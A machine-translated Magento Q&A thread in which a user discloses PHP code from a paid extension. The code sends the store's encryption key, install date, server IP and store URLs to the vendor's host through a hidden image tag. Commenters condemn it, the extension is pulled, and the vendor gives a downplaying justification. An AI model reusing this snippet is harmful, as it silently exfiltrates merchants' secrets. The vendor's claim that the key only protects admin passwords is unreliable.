Adakah alasan yang bagus untuk suatu modul untuk mengakses global / crypt / key dari jarak jauh?

19

Maafkan ketidaktahuan saya, tetapi kunci crypt digunakan untuk mendekripsi data Magento, kan? Apakah ada alasan bagus untuk modul mengakses ini? Saya menemukan kode ini setelah menginstal Manajer Konten Lanjutan ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

magento-1.9 TylersSN
sumber
3
INI. ADALAH. MENGERIKAN. Tidak ada alasan untuk membocorkan kunci enkripsi Anda.
Fabian Blechschmidt
1
Ini buruk, sangat buruk.
Anna Völkl
1
Tangkapan bagus! Ini sangat buruk ...
Sander Mangel
1
Terima kasih @Sander karena memberi tahu kami. Sudah dihapus dari Connect.
patokan
1
@Banda senang mendengarnya. Ini sangat mengecewakan karena alasan yang jelas juga karena aplikasi ini sangat mengesankan dan pengembang sangat membantu dan cepat di masa lalu.
TylersSN

Jawaban:

11

Ya ... ada alasan bagus.
Mereka ingin mengetahuinya dan mencatatnya, untuk berjaga-jaga. :)

Anda harus menghapus instalan ekstensi (kemungkinan besar sudah Anda lakukan). Anda tidak boleh menggunakan ekstensi yang "beranda telepon", tidak peduli data apa pun yang mereka kirimkan pulang.

Anda mungkin ingin mendaftar ekstensi di sini agar orang lain dapat melihatnya: Kode Lucu / Tidak Berguna / Mengerikan dari Magento Extensions

Marius
sumber
1
"Menelepon ke rumah" sayangnya dilakukan oleh banyak modul. Amasty dan Aheadworks melakukannya juga: \
Sander Mangel
4
Gist.github.com/miguelbalparda/b57a47a010a5995bc44d ini dapat digunakan untuk memeriksa global / crypt / key dari CLI di semua folder termasuk app / code / core.
mbalparda
Jadi tidak hanya mereka dapat mendekripsi data cc (untungnya saya tidak menyimpannya) kata sandi, dll. Tapi saya membayar $ 300 untuk mereka memiliki kemampuan itu. Itulah yang harus diposting ke Funny.
TylersSN
1
@iUseMagentoNow. Ini lucu "ooh", bukan lucu "ha ha". Anda harus meminta uang Anda kembali.
Marius
8

Kami mendapat permintaan dukungan tentang fitur ini hari ini. Kami sudah menyelesaikannya dan menghapus kode ini. Rilis baru tersedia untuk semua pelanggan kami di area pelanggan mereka (gratis, karena kami menawarkan pembaruan tanpa batas).

Saya tahu kita perlu membenarkan ini, jadi mari kita lakukan itu:

  • Tujuan pelacak ini HANYA untuk mengikuti penggunaan ekstensi kami yang tidak sah.
  • Pelacak hanya ditampilkan di area admin (tidak ada pelanggan Anda atau orang lain selain Anda dan kami yang dapat melihatnya).
  • Kami menghapus ini di DB kami juga.
  • Kuncinya hanya untuk mengenkripsi kata sandi admin Anda. Seperti yang kami gunakan untuk bekerja dengan Anda semua melalui permintaan dukungan, Anda mungkin sudah mengirimkan kredensial Anda kepada kami melalui email, untuk mendapatkan dukungan. Jika kami menginginkan kata sandi Anda, kami akan langsung mengirimkannya ... Itu bukan tujuannya.
  • Bahkan dengan kunci, kata sandi Anda masih dienkripsi. Dan admin magento memblokir pengguna setelah beberapa upaya.

Kami menyadari bahwa ini adalah kesalahan, dan ini adalah kekuatan komunitas dan sistem open source: kami dapat memperbaiki dan meningkatkan lebih cepat. Terima kasih semua karena telah memberi tahu kami, kami akan melakukan lebih banyak upaya pada kerentanan sekarang.

Manajer konten lanjutan
sumber
3
+1 untuk berupaya merespons di sini di depan umum di Magento SE!
7ochem
2
Penggunaan ekstensi tanpa izin? Anda cukup menggunakan domain untuk itu.
mbalparda